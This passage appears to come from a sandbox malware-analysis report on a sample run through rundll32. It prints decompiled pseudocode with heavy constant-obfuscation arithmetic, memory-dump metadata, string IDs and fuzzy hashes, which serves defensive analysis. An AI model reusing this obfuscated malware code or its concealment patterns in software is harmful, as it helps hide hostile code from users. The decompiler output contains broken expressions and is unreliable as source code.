                                                                                                                      						_v56 = _v56 & 0x00000000;
                                                                                                                      						_v60 = _t1055;
                                                                                                                      						_v52 = 1;
                                                                                                                      						_v68 = 2 + _t915 * 2;
                                                                                                                      						_v48 =  &_v68;
                                                                                                                      						_t918 = 0x20;
                                                                                                                      						_v76 = _t918;
                                                                                                                      						E002B5C98(_v404, _v312, _t913, _v160,  &_v76,  &_v56, _v112, _v256,  &_v32, _t918, _v72, _v320);
                                                                                                                      						_t927 =  ==  ? 0x9627218 : 0xf59c021;
                                                                                                                      						E002BAE03(_v92, _v304, _v340, _t1055);
                                                                                                                      						E002BAE03(_v152, _v296, _v248, _t913);
                                                                                                                      						_t1065 =  &(_t1065[0x17]);
                                                                                                                      						goto L9;
                                                                                                                      						L25:
                                                                                                                      					} while (_t927 != 0x7114309);
                                                                                                                      					goto L18;
                                                                                                                      				}
                                                                                                                      			}
                                                                                                                      0x002bd162
                                                                                                                      0x002bd16d
                                                                                                                      0x002bd175
                                                                                                                      0x002bd179
                                                                                                                      0x002bd17e
                                                                                                                      0x002bd186
                                                                                                                      0x002bd18e
                                                                                                                      0x002bd199
                                                                                                                      0x002bd1a4
                                                                                                                      0x002bd1af
                                                                                                                      0x002bd1b7
                                                                                                                      0x002bd1bf
                                                                                                                      0x002bd1c7
                                                                                                                      0x002bd1cf
                                                                                                                      0x002bd1d9
                                                                                                                      0x002bd1ef
                                                                                                                      0x002bd1f8
                                                                                                                      0x002bd203
                                                                                                                      0x002bd20e
                                                                                                                      0x002bd221
                                                                                                                      0x002bd224
                                                                                                                      0x002bd22b
                                                                                                                      0x002bd236
                                                                                                                      0x002bd241
                                                                                                                      0x002bd24c
                                                                                                                      0x002bd257
                                                                                                                      0x002bd262
                                                                                                                      0x002bd26d
                                                                                                                      0x002bd278
                                                                                                                      0x002bd283
                                                                                                                      0x002bd28b
                                                                                                                      0x002bd296
                                                                                                                      0x002bd2a1
                                                                                                                      0x002bd2ac
                                                                                                                      0x002bd2b7
                                                                                                                      0x002bd2c2
                                                                                                                      0x002bd2cd
                                                                                                                      0x002bd2d5
                                                                                                                      0x002bd2dd
                                                                                                                      0x002bd2e2
                                                                                                                      0x002bd2ea
                                                                                                                      0x002bd2f2
                                                                                                                      0x002bd2fa
                                                                                                                      0x002bd304
                                                                                                                      0x002bd308
                                                                                                                      0x002bd310
                                                                                                                      0x002bd318
                                                                                                                      0x002bd323
                                                                                                                      0x002bd32e
                                                                                                                      0x002bd339
                                                                                                                      0x002bd344
                                                                                                                      0x002bd35a
                                                                                                                      0x002bd369
                                                                                                                      0x002bd36a
                                                                                                                      0x002bd371
                                                                                                                      0x002bd37c
                                                                                                                      0x002bd390
                                                                                                                      0x002bd397
                                                                                                                      0x002bd3a2
                                                                                                                      0x002bd3aa
                                                                                                                      0x002bd3b2
                                                                                                                      0x002bd3b6
                                                                                                                      0x002bd3be
                                                                                                                      0x002bd3c6
                                                                                                                      0x002bd3d1
                                                                                                                      0x002bd3dc
                                                                                                                      0x002bd3e7
                                                                                                                      0x002bd3f2
                                                                                                                      0x002bd3fd
                                                                                                                      0x002bd408
                                                                                                                      0x002bd410
                                                                                                                      0x002bd418
                                                                                                                      0x002bd420
                                                                                                                      0x002bd425
                                                                                                                      0x002bd42d
                                                                                                                      0x002bd438
                                                                                                                      0x002bd440
                                                                                                                      0x002bd44b
                                                                                                                      0x002bd456
                                                                                                                      0x002bd461
                                                                                                                      0x002bd468
                                                                                                                      0x002bd473
                                                                                                                      0x002bd47b
                                                                                                                      0x002bd480
                                                                                                                      0x002bd484
                                                                                                                      0x002bd48b
                                                                                                                      0x002bd493
                                                                                                                      0x002bd49e
                                                                                                                      0x002bd4b2
                                                                                                                      0x002bd4b7
                                                                                                                      0x002bd4c0
                                                                                                                      0x002bd4cb
                                                                                                                      0x002bd4d8
                                                                                                                      0x002bd4db
                                                                                                                      0x002bd4df
                                                                                                                      0x002bd4ec
                                                                                                                      0x002bd4f0
                                                                                                                      0x002bd4f8
                                                                                                                      0x002bd503
                                                                                                                      0x002bd50e
                                                                                                                      0x002bd519
                                                                                                                      0x002bd521
                                                                                                                      0x002bd529
                                                                                                                      0x002bd531
                                                                                                                      0x002bd539
                                                                                                                      0x002bd541
                                                                                                                      0x002bd553
                                                                                                                      0x002bd558
                                                                                                                      0x002bd561
                                                                                                                      0x002bd56c
                                                                                                                      0x002bd577
                                                                                                                      0x002bd589
                                                                                                                      0x002bd58e
                                                                                                                      0x002bd597
                                                                                                                      0x002bd5a2
                                                                                                                      0x002bd5ad
                                                                                                                      0x002bd5b8
                                                                                                                      0x002bd5c3
                                                                                                                      0x002bd5cb
                                                                                                                      0x002bd5d8
                                                                                                                      0x002bd5d9
                                                                                                                      0x002bd5dd
                                                                                                                      0x002bd5e2
                                                                                                                      0x002bd5ea
                                                                                                                      0x002bd5f5
                                                                                                                      0x002bd600
                                                                                                                      0x002bd60b
                                                                                                                      0x002bd616
                                                                                                                      0x002bd61e
                                                                                                                      0x002bd629
                                                                                                                      0x002bd631
                                                                                                                      0x002bd636
                                                                                                                      0x002bd63e
                                                                                                                      0x002bd646
                                                                                                                      0x002bd64e
                                                                                                                      0x002bd656
                                                                                                                      0x002bd65b
                                                                                                                      0x002bd663
                                                                                                                      0x002bd66b
                                                                                                                      0x002bd676
                                                                                                                      0x002bd687
                                                                                                                      0x002bd68e
                                                                                                                      0x002bd699
                                                                                                                      0x002bd6a4
                                                                                                                      0x002bd6ad
                                                                                                                      0x002bd6b8
                                                                                                                      0x002bd6c3
                                                                                                                      0x002bd6d7
                                                                                                                      0x002bd6dc
                                                                                                                      0x002bd6e3
                                                                                                                      0x002bd6ee
                                                                                                                      0x002bd6f6
                                                                                                                      0x002bd6fe
                                                                                                                      0x002bd706
                                                                                                                      0x002bd70e
                                                                                                                      0x002bd724
                                                                                                                      0x002bd72b
                                                                                                                      0x002bd736
                                                                                                                      0x002bd741
                                                                                                                      0x002bd74c
                                                                                                                      0x002bd757
                                                                                                                      0x002bd762
                                                                                                                      0x002bd76a
                                                                                                                      0x002bd776
                                                                                                                      0x002bd779
                                                                                                                      0x002bd77d
                                                                                                                      0x002bd785
                                                                                                                      0x002bd78d
                                                                                                                      0x002bd798
                                                                                                                      0x002bd7a3
                                                                                                                      0x002bd7ae
                                                                                                                      0x002bd7b9
                                                                                                                      0x002bd7cf
                                                                                                                      0x002bd7d6
                                                                                                                      0x002bd7e1
                                                                                                                      0x002bd7ec
                                                                                                                      0x002bd7fe
                                                                                                                      0x002bd803
                                                                                                                      0x002bd80a
                                                                                                                      0x002bd815
                                                                                                                      0x002bd820
                                                                                                                      0x002bd831
                                                                                                                      0x002bd838
                                                                                                                      0x002bd843
                                                                                                                      0x002bd856
                                                                                                                      0x002bd85d
                                                                                                                      0x002bd868
                                                                                                                      0x002bd870
                                                                                                                      0x002bd874
                                                                                                                      0x002bd879
                                                                                                                      0x002bd87e
                                                                                                                      0x002bd886
                                                                                                                      0x002bd891
                                                                                                                      0x002bd8a4
                                                                                                                      0x002bd8ab
                                                                                                                      0x002bd8b6
                                                                                                                      0x002bd8c9
                                                                                                                      0x002bd8d0
                                                                                                                      0x002bd8d8
                                                                                                                      0x002bd8e5
                                                                                                                      0x002bd8f3
                                                                                                                      0x002bd8f8
                                                                                                                      0x002bd8fc
                                                                                                                      0x002bd904
                                                                                                                      0x002bd90c
                                                                                                                      0x002bd914
                                                                                                                      0x002bd91c
                                                                                                                      0x002bd921
                                                                                                                      0x002bd929
                                                                                                                      0x002bd92e
                                                                                                                      0x002bd936
                                                                                                                      0x002bd93e
                                                                                                                      0x002bd94d
                                                                                                                      0x002bd950
                                                                                                                      0x002bd95c
                                                                                                                      0x002bd960
                                                                                                                      0x002bd968

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8s$#$*>@$.v:$/$0aQX$R5o$SSe$SN$^JxL$fFV$q<$rp$A@
                                                                                                                      • API String ID: 0-3270405876
                                                                                                                      • Opcode ID: 574d6e368205d17fafdfc36b54927843730fc9d41018c106c5606b3948b165ec
                                                                                                                      • Instruction ID: dca0ae06a56bc765485ced68010ed1ef8460e1a60027ff7e7bdef3c23d573ffa
                                                                                                                      • Opcode Fuzzy Hash: 574d6e368205d17fafdfc36b54927843730fc9d41018c106c5606b3948b165ec
                                                                                                                      • Instruction Fuzzy Hash: F592FE715093818FD3B9CF25C58ABCBBBE2BBC5304F10891DE59A86260DBB18959CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E002B9A7D(intOrPtr* __ecx) {
                                                                                                                      				char _v68;
                                                                                                                      				char _v76;
                                                                                                                      				char _v80;
                                                                                                                      				intOrPtr* _v84;
                                                                                                                      				char _v88;
                                                                                                                      				char _v92;
                                                                                                                      				char _v96;
                                                                                                                      				char _v100;
                                                                                                                      				char _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
                                                                                                                      				signed int _v204;
                                                                                                                      				unsigned int _v208;
                                                                                                                      				signed int _v212;
                                                                                                                      				signed int _v216;
                                                                                                                      				signed int _v220;
                                                                                                                      				signed int _v224;
                                                                                                                      				signed int _v228;
                                                                                                                      				signed int _v232;
                                                                                                                      				signed int _v236;
                                                                                                                      				signed int _v240;
                                                                                                                      				signed int _v244;
                                                                                                                      				signed int _v248;
                                                                                                                      				signed int _v252;
                                                                                                                      				signed int _v256;
                                                                                                                      				signed int _v260;
                                                                                                                      				signed int _v264;
                                                                                                                      				signed int _v268;
                                                                                                                      				signed int _v272;
                                                                                                                      				signed int _v276;
                                                                                                                      				signed int _v280;
                                                                                                                      				signed int _v284;
                                                                                                                      				signed int _v288;
                                                                                                                      				signed int _v292;
                                                                                                                      				signed int _v296;
                                                                                                                      				signed int _v300;
                                                                                                                      				signed int _v304;
                                                                                                                      				signed int _v308;
                                                                                                                      				signed int _v312;
                                                                                                                      				signed int _v316;
                                                                                                                      				signed int _v320;
                                                                                                                      				signed int _v324;
                                                                                                                      				signed int _v328;
                                                                                                                      				signed int _v332;
                                                                                                                      				signed int _v336;
                                                                                                                      				signed int _v340;
                                                                                                                      				signed int _v344;
                                                                                                                      				signed int _v348;
                                                                                                                      				signed int _v352;
                                                                                                                      				signed int _v356;
                                                                                                                      				signed int _v360;
                                                                                                                      				signed int _v364;
                                                                                                                      				signed int _v368;
                                                                                                                      				signed int _v372;
                                                                                                                      				signed int _v376;
                                                                                                                      				signed int _v380;
                                                                                                                      				signed int _v384;
                                                                                                                      				signed int _v388;
                                                                                                                      				signed int _v392;
                                                                                                                      				signed int _v396;
                                                                                                                      				signed int _v400;
                                                                                                                      				signed int _v404;
                                                                                                                      				signed int _v408;
                                                                                                                      				signed int _v412;
                                                                                                                      				signed int _v416;
                                                                                                                      				void* _t761;
                                                                                                                      				void* _t762;
                                                                                                                      				void* _t764;
                                                                                                                      				void* _t768;
                                                                                                                      				intOrPtr _t770;
                                                                                                                      				void* _t775;
                                                                                                                      				void* _t784;
                                                                                                                      				void* _t796;
                                                                                                                      				signed int _t802;
                                                                                                                      				signed int _t803;
                                                                                                                      				signed int _t804;
                                                                                                                      				signed int _t805;
                                                                                                                      				signed int _t806;
                                                                                                                      				signed int _t807;
                                                                                                                      				signed int _t808;
                                                                                                                      				signed int _t809;
                                                                                                                      				signed int _t810;
                                                                                                                      				signed int _t811;
                                                                                                                      				signed int _t812;
                                                                                                                      				signed int _t813;
                                                                                                                      				void* _t814;
                                                                                                                      				void* _t880;
                                                                                                                      				intOrPtr* _t900;
                                                                                                                      				signed int _t902;
                                                                                                                      				void* _t903;
                                                                                                                      				void* _t907;
                                                                                                                      				void* _t908;
                                                                                                                      				void* _t915;
                                                                                                                      
                                                                                                                      				_v120 = 0xaf91c9;
                                                                                                                      				_v120 = _v120 * 0xc;
                                                                                                                      				_t900 = __ecx;
                                                                                                                      				_v120 = _v120 ^ 0x083ad56c;
                                                                                                                      				_t907 = 0;
                                                                                                                      				_v160 = 0xdd67b2;
                                                                                                                      				_t796 = 0x60e8fa3;
                                                                                                                      				_v160 = _v160 + 0xffff9007;
                                                                                                                      				_v160 = _v160 ^ 0x00dcf7b9;
                                                                                                                      				_v128 = 0xd2bb52;
                                                                                                                      				_v128 = _v128 + 0x4dd6;
                                                                                                                      				_v128 = _v128 ^ 0x00d30928;
                                                                                                                      				_v340 = 0x29bf77;
                                                                                                                      				_v340 = _v340 | 0xa59b3ed7;
                                                                                                                      				_t802 = 0x26;
                                                                                                                      				_v84 = __ecx;
                                                                                                                      				_v340 = _v340 * 0x24;
                                                                                                                      				_v340 = _v340 / _t802;
                                                                                                                      				_v340 = _v340 ^ 0x02102f1f;
                                                                                                                      				_v136 = 0x5cee52;
                                                                                                                      				_t31 =  &_v136; // 0x5cee52
                                                                                                                      				_v136 =  *_t31 * 0x7d;
                                                                                                                      				_v136 = _v136 ^ 0x2d605e0a;
                                                                                                                      				_v108 = 0xa45e80;
                                                                                                                      				_v108 = _v108 | 0x375210cb;
                                                                                                                      				_v108 = _v108 ^ 0x37f65ecb;
                                                                                                                      				_v280 = 0xda067f;
                                                                                                                      				_v280 = _v280 / _t802;
                                                                                                                      				_v280 = _v280 + 0xffff2a0f;
                                                                                                                      				_v280 = _v280 ^ 0x0004e6dc;
                                                                                                                      				_v272 = 0x722186;
                                                                                                                      				_v272 = _v272 ^ 0xa185ec82;
                                                                                                                      				_v272 = _v272 ^ 0x3ba6498b;
                                                                                                                      				_v272 = _v272 ^ 0x9a51848f;
                                                                                                                      				_v292 = 0x4e3196;
                                                                                                                      				_v292 = _v292 + 0xb94f;
                                                                                                                      				_v292 = _v292 * 0x4e;
                                                                                                                      				_v292 = _v292 ^ 0x180b91c6;
                                                                                                                      				_v208 = 0x6998d9;
                                                                                                                      				_v208 = _v208 >> 0xe;
                                                                                                                      				_v208 = _v208 ^ 0x000001a6;
                                                                                                                      				_v240 = 0x4e7103;
                                                                                                                      				_v240 = _v240 * 0x4c;
                                                                                                                      				_v240 = _v240 ^ 0xd0eec6a6;
                                                                                                                      				_v240 = _v240 ^ 0xc7a74a42;
                                                                                                                      				_v312 = 0x7234ec;
                                                                                                                      				_v312 = _v312 ^ 0x522d2006;
                                                                                                                      				_v312 = _v312 << 6;
                                                                                                                      				_v312 = _v312 + 0x869a;
                                                                                                                      				_v312 = _v312 ^ 0x97c5c11a;
                                                                                                                      				_v364 = 0xaf3901;
                                                                                                                      				_v364 = _v364 + 0xffff0df3;
                                                                                                                      				_v364 = _v364 + 0xacd;
                                                                                                                      				_v364 = _v364 << 6;
                                                                                                                      				_v364 = _v364 ^ 0x2b91257f;
                                                                                                                      				_v244 = 0x42065a;
                                                                                                                      				_v244 = _v244 >> 8;
                                                                                                                      				_v244 = _v244 + 0x3d61;
                                                                                                                      				_v244 = _v244 ^ 0x000e9124;
                                                                                                                      				_v308 = 0x462496;
                                                                                                                      				_v308 = _v308 >> 1;
                                                                                                                      				_v308 = _v308 << 8;
                                                                                                                      				_v308 = _v308 + 0xc751;
                                                                                                                      				_v308 = _v308 ^ 0x2311deb1;
                                                                                                                      				_v372 = 0x2d527a;
                                                                                                                      				_v372 = _v372 >> 0xe;
                                                                                                                      				_v372 = _v372 << 0xb;
                                                                                                                      				_t902 = 0x27;
                                                                                                                      				_t803 = 0x29;
                                                                                                                      				_v372 = _v372 * 0x71;
                                                                                                                      				_v372 = _v372 ^ 0x027ecd5f;
                                                                                                                      				_v332 = 0xa669b;
                                                                                                                      				_v332 = _v332 >> 7;
                                                                                                                      				_v332 = _v332 + 0xd2e3;
                                                                                                                      				_v332 = _v332 >> 0xa;
                                                                                                                      				_v332 = _v332 ^ 0x000f2e3e;
                                                                                                                      				_v168 = 0x4e96bd;
                                                                                                                      				_v168 = _v168 << 3;
                                                                                                                      				_v168 = _v168 ^ 0x02701882;
                                                                                                                      				_v112 = 0xaba749;
                                                                                                                      				_v112 = _v112 / _t902;
                                                                                                                      				_v112 = _v112 ^ 0x0003e5b7;
                                                                                                                      				_v176 = 0xf83e47;
                                                                                                                      				_v176 = _v176 + 0xf669;
                                                                                                                      				_v176 = _v176 ^ 0x00f8a104;
                                                                                                                      				_v416 = 0x697041;
                                                                                                                      				_v416 = _v416 | 0x82970019;
                                                                                                                      				_v416 = _v416 / _t803;
                                                                                                                      				_v416 = _v416 + 0xffffd466;
                                                                                                                      				_v416 = _v416 ^ 0x0334f61d;
                                                                                                                      				_v252 = 0x15ebd3;
                                                                                                                      				_v252 = _v252 | 0x6e052c00;
                                                                                                                      				_t804 = 0x67;
                                                                                                                      				_v252 = _v252 / _t804;
                                                                                                                      				_v252 = _v252 ^ 0x0113ba89;
                                                                                                                      				_v276 = 0x344c30;
                                                                                                                      				_v276 = _v276 | 0x5d3660a5;
                                                                                                                      				_v276 = _v276 ^ 0x29f3ee58;
                                                                                                                      				_v276 = _v276 ^ 0x74c4d850;
                                                                                                                      				_v400 = 0xfbb174;
                                                                                                                      				_v400 = _v400 << 7;
                                                                                                                      				_v400 = _v400 ^ 0xf4a56f7f;
                                                                                                                      				_v400 = _v400 + 0xb6a2;
                                                                                                                      				_v400 = _v400 ^ 0x897127f1;
                                                                                                                      				_v408 = 0xeb5219;
                                                                                                                      				_v408 = _v408 + 0x740f;
                                                                                                                      				_v408 = _v408 << 0x10;
                                                                                                                      				_t805 = 0x65;
                                                                                                                      				_v408 = _v408 / _t805;
                                                                                                                      				_v408 = _v408 ^ 0x01f5cec8;
                                                                                                                      				_v268 = 0xb10ed5;
                                                                                                                      				_t806 = 0x6b;
                                                                                                                      				_v268 = _v268 * 0x79;
                                                                                                                      				_v268 = _v268 | 0x0fb1f039;
                                                                                                                      				_v268 = _v268 ^ 0x5fbe4096;
                                                                                                                      				_v132 = 0x68a9ad;
                                                                                                                      				_v132 = _v132 | 0x3a05ff43;
                                                                                                                      				_v132 = _v132 ^ 0x3a6b0a8d;
                                                                                                                      				_v392 = 0x795a70;
                                                                                                                      				_v392 = _v392 >> 0xd;
                                                                                                                      				_v392 = _v392 * 0x48;
                                                                                                                      				_v392 = _v392 / _t806;
                                                                                                                      				_v392 = _v392 ^ 0x000937af;
                                                                                                                      				_v236 = 0x1e45d1;
                                                                                                                      				_t807 = 0x32;
                                                                                                                      				_v236 = _v236 / _t807;
                                                                                                                      				_v236 = _v236 + 0xffffc842;
                                                                                                                      				_v236 = _v236 ^ 0x0007e8a5;
                                                                                                                      				_v228 = 0x827416;
                                                                                                                      				_v228 = _v228 << 4;
                                                                                                                      				_v228 = _v228 ^ 0x0826c6ea;
                                                                                                                      				_v284 = 0xd86f33;
                                                                                                                      				_v284 = _v284 << 0xe;
                                                                                                                      				_v284 = _v284 + 0xcd5c;
                                                                                                                      				_v284 = _v284 ^ 0x1bc78313;
                                                                                                                      				_v380 = 0x51f478;
                                                                                                                      				_v380 = _v380 | 0x2ab41351;
                                                                                                                      				_t808 = 0x6a;
                                                                                                                      				_v380 = _v380 / _t808;
                                                                                                                      				_v380 = _v380 ^ 0x7d9f8aa1;
                                                                                                                      				_v380 = _v380 ^ 0x7df5e8b9;
                                                                                                                      				_v192 = 0x594da7;
                                                                                                                      				_v192 = _v192 + 0xffff4010;
                                                                                                                      				_v192 = _v192 ^ 0x00542d8e;
                                                                                                                      				_v324 = 0x9c8afa;
                                                                                                                      				_t809 = 0x1e;
                                                                                                                      				_v324 = _v324 / _t809;
                                                                                                                      				_v324 = _v324 >> 0xb;
                                                                                                                      				_v324 = _v324 / _t902;
                                                                                                                      				_v324 = _v324 ^ 0x0001b8f0;
                                                                                                                      				_v212 = 0xd229d7;
                                                                                                                      				_v212 = _v212 << 3;
                                                                                                                      				_v212 = _v212 ^ 0x069444ca;
                                                                                                                      				_v288 = 0xa34a44;
                                                                                                                      				_v288 = _v288 ^ 0x8cd8fe8c;
                                                                                                                      				_v288 = _v288 + 0xffff9af8;
                                                                                                                      				_v288 = _v288 ^ 0x8c7655cb;
                                                                                                                      				_v220 = 0x9493db;
                                                                                                                      				_v220 = _v220 | 0x71cebed0;
                                                                                                                      				_v220 = _v220 ^ 0x71dfb10a;
                                                                                                                      				_v224 = 0xf1176b;
                                                                                                                      				_v224 = _v224 + 0xffffb0e2;
                                                                                                                      				_v224 = _v224 ^ 0x00f1becf;
                                                                                                                      				_v352 = 0xae98d2;
                                                                                                                      				_v352 = _v352 + 0xffffb89b;
                                                                                                                      				_v352 = _v352 * 0x11;
                                                                                                                      				_v352 = _v352 + 0x4d1e;
                                                                                                                      				_v352 = _v352 ^ 0x0b9fceb7;
                                                                                                                      				_v180 = 0x84b950;
                                                                                                                      				_v180 = _v180 >> 0xc;
                                                                                                                      				_v180 = _v180 ^ 0x00015b12;
                                                                                                                      				_v360 = 0x38dd65;
                                                                                                                      				_v360 = _v360 << 8;
                                                                                                                      				_v360 = _v360 << 0xb;
                                                                                                                      				_v360 = _v360 + 0xffffe7b0;
                                                                                                                      				_v360 = _v360 ^ 0xeb2159a9;
                                                                                                                      				_v188 = 0x175413;
                                                                                                                      				_v188 = _v188 | 0xeaa62ca7;
                                                                                                                      				_v188 = _v188 ^ 0xeab1c509;
                                                                                                                      				_v196 = 0x89f8f3;
                                                                                                                      				_v196 = _v196 | 0x84cde34a;
                                                                                                                      				_v196 = _v196 ^ 0x84ce03e9;
                                                                                                                      				_v204 = 0xfa0198;
                                                                                                                      				_v204 = _v204 + 0xba3a;
                                                                                                                      				_v204 = _v204 ^ 0x00fbcf1f;
                                                                                                                      				_v368 = 0x243d47;
                                                                                                                      				_v368 = _v368 + 0x6af1;
                                                                                                                      				_v368 = _v368 * 0x18;
                                                                                                                      				_t810 = 0x4c;
                                                                                                                      				_v368 = _v368 * 0x4a;
                                                                                                                      				_v368 = _v368 ^ 0xfe46f3db;
                                                                                                                      				_v164 = 0xfa5634;
                                                                                                                      				_v164 = _v164 << 0xa;
                                                                                                                      				_v164 = _v164 ^ 0xe95805f5;
                                                                                                                      				_v172 = 0x9d86eb;
                                                                                                                      				_v172 = _v172 << 4;
                                                                                                                      				_v172 = _v172 ^ 0x09d75722;
                                                                                                                      				_v256 = 0x88ae25;
                                                                                                                      				_v256 = _v256 + 0xffff9888;
                                                                                                                      				_v256 = _v256 / _t810;
                                                                                                                      				_v256 = _v256 ^ 0x0006cec9;
                                                                                                                      				_v300 = 0x4e3cba;
                                                                                                                      				_v300 = _v300 ^ 0xaec86311;
                                                                                                                      				_v300 = _v300 >> 1;
                                                                                                                      				_v300 = _v300 ^ 0x574be554;
                                                                                                                      				_v156 = 0xcc8ccd;
                                                                                                                      				_v156 = _v156 ^ 0x818e95a6;
                                                                                                                      				_v156 = _v156 ^ 0x8149d9f5;
                                                                                                                      				_v124 = 0x282d8b;
                                                                                                                      				_t811 = 0x63;
                                                                                                                      				_v124 = _v124 / _t811;
                                                                                                                      				_v124 = _v124 ^ 0x0006a08e;
                                                                                                                      				_v356 = 0x703a6e;
                                                                                                                      				_v356 = _v356 << 0xf;
                                                                                                                      				_t812 = 0x17;
                                                                                                                      				_v356 = _v356 / _t812;
                                                                                                                      				_v356 = _v356 * 0x47;
                                                                                                                      				_v356 = _v356 ^ 0x5a27ab7c;
                                                                                                                      				_v184 = 0xabb004;
                                                                                                                      				_v184 = _v184 * 0x62;
                                                                                                                      				_v184 = _v184 ^ 0x41bb11d7;
                                                                                                                      				_v412 = 0xb8c7ed;
                                                                                                                      				_v412 = _v412 * 0x62;
                                                                                                                      				_v412 = _v412 + 0xffff10d9;
                                                                                                                      				_v412 = _v412 * 0x19;
                                                                                                                      				_v412 = _v412 ^ 0xe85860ff;
                                                                                                                      				_v264 = 0x94e0d2;
                                                                                                                      				_v264 = _v264 + 0xffffdaee;
                                                                                                                      				_v264 = _v264 | 0xae8d85da;
                                                                                                                      				_v264 = _v264 ^ 0xae9ce3c7;
                                                                                                                      				_v316 = 0xd1b765;
                                                                                                                      				_v316 = _v316 * 0x77;
                                                                                                                      				_v316 = _v316 + 0xe12c;
                                                                                                                      				_v316 = _v316 + 0x9f51;
                                                                                                                      				_v316 = _v316 ^ 0x617dce52;
                                                                                                                      				_v144 = 0xce6b76;
                                                                                                                      				_v144 = _v144 | 0xba09f1aa;
                                                                                                                      				_v144 = _v144 ^ 0xbac3e068;
                                                                                                                      				_v404 = 0x63322a;
                                                                                                                      				_v404 = _v404 ^ 0x9f0f399b;
                                                                                                                      				_v404 = _v404 * 0x4e;
                                                                                                                      				_v404 = _v404 * 0x4a;
                                                                                                                      				_v404 = _v404 ^ 0x78104cb3;
                                                                                                                      				_v216 = 0xd594b2;
                                                                                                                      				_v216 = _v216 + 0xf571;
                                                                                                                      				_v216 = _v216 ^ 0x00d5cf76;
                                                                                                                      				_v116 = 0xef919a;
                                                                                                                      				_v116 = _v116 << 0xd;
                                                                                                                      				_v116 = _v116 ^ 0xf23180e8;
                                                                                                                      				_v348 = 0xce0390;
                                                                                                                      				_v348 = _v348 + 0xffffa675;
                                                                                                                      				_v348 = _v348 + 0xffff84a1;
                                                                                                                      				_v348 = _v348 ^ 0x00c1e2da;
                                                                                                                      				_v396 = 0x7df7ff;
                                                                                                                      				_v396 = _v396 | 0xfdfffbfc;
                                                                                                                      				_v396 = _v396 ^ 0xfdff4c22;
                                                                                                                      				_v320 = 0x9ca349;
                                                                                                                      				_v320 = _v320 + 0xc568;
                                                                                                                      				_t813 = 7;
                                                                                                                      				_v320 = _v320 * 0x74;
                                                                                                                      				_v320 = _v320 * 0x14;
                                                                                                                      				_v320 = _v320 ^ 0x928c2e40;
                                                                                                                      				_v232 = 0xd54f23;
                                                                                                                      				_v232 = _v232 ^ 0xe15f8e30;
                                                                                                                      				_v232 = _v232 >> 9;
                                                                                                                      				_v232 = _v232 ^ 0x0079ed07;
                                                                                                                      				_v328 = 0x9619e2;
                                                                                                                      				_v328 = _v328 >> 0xf;
                                                                                                                      				_v328 = _v328 + 0xffff55f8;
                                                                                                                      				_v328 = _v328 + 0x27fc;
                                                                                                                      				_v328 = _v328 ^ 0xfffb07bb;
                                                                                                                      				_v388 = 0xf5c662;
                                                                                                                      				_v388 = _v388 + 0xffff192d;
                                                                                                                      				_v388 = _v388 << 6;
                                                                                                                      				_v388 = _v388 ^ 0x81a7a751;
                                                                                                                      				_v388 = _v388 ^ 0xbc9807e7;
                                                                                                                      				_v200 = 0x8d276;
                                                                                                                      				_v200 = _v200 | 0x4d140240;
                                                                                                                      				_v200 = _v200 ^ 0x4d1b4a48;
                                                                                                                      				_v260 = 0x1bde30;
                                                                                                                      				_v260 = _v260 / _t813;
                                                                                                                      				_v260 = _v260 ^ 0x62b9a7e6;
                                                                                                                      				_v260 = _v260 ^ 0x62b42e65;
                                                                                                                      				_v148 = 0xa934f2;
                                                                                                                      				_v148 = _v148 | 0xd141041b;
                                                                                                                      				_v148 = _v148 ^ 0xd1e1ef22;
                                                                                                                      				_v336 = 0xd722ef;
                                                                                                                      				_v336 = _v336 ^ 0xf728ea61;
                                                                                                                      				_v336 = _v336 * 0x41;
                                                                                                                      				_v336 = _v336 + 0xdc3e;
                                                                                                                      				_v336 = _v336 ^ 0xf7ff9a03;
                                                                                                                      				_v344 = 0x7da9d7;
                                                                                                                      				_v344 = _v344 * 0x5b;
                                                                                                                      				_v344 = _v344 >> 5;
                                                                                                                      				_v344 = _v344 ^ 0xb332f6cb;
                                                                                                                      				_v344 = _v344 ^ 0xb251ceff;
                                                                                                                      				_v248 = 0xd93304;
                                                                                                                      				_v248 = _v248 << 5;
                                                                                                                      				_v248 = _v248 * 0xa;
                                                                                                                      				_v248 = _v248 ^ 0x0f7c3f5b;
                                                                                                                      				_v376 = 0xe01f7;
                                                                                                                      				_v376 = _v376 + 0xffff5834;
                                                                                                                      				_v376 = _v376 + 0xffff4130;
                                                                                                                      				_v376 = _v376 ^ 0xd27aacc5;
                                                                                                                      				_v376 = _v376 ^ 0xd2797cee;
                                                                                                                      				_v152 = 0x8f3686;
                                                                                                                      				_v152 = _v152 >> 0xc;
                                                                                                                      				_v152 = _v152 ^ 0x000cec01;
                                                                                                                      				_v384 = 0x1fccfd;
                                                                                                                      				_v384 = _v384 ^ 0xe361d411;
                                                                                                                      				_v384 = _v384 * 0x14;
                                                                                                                      				_v384 = _v384 + 0xb1de;
                                                                                                                      				_v384 = _v384 ^ 0xc5d6ed44;
                                                                                                                      				_v296 = 0x2c9c5a;
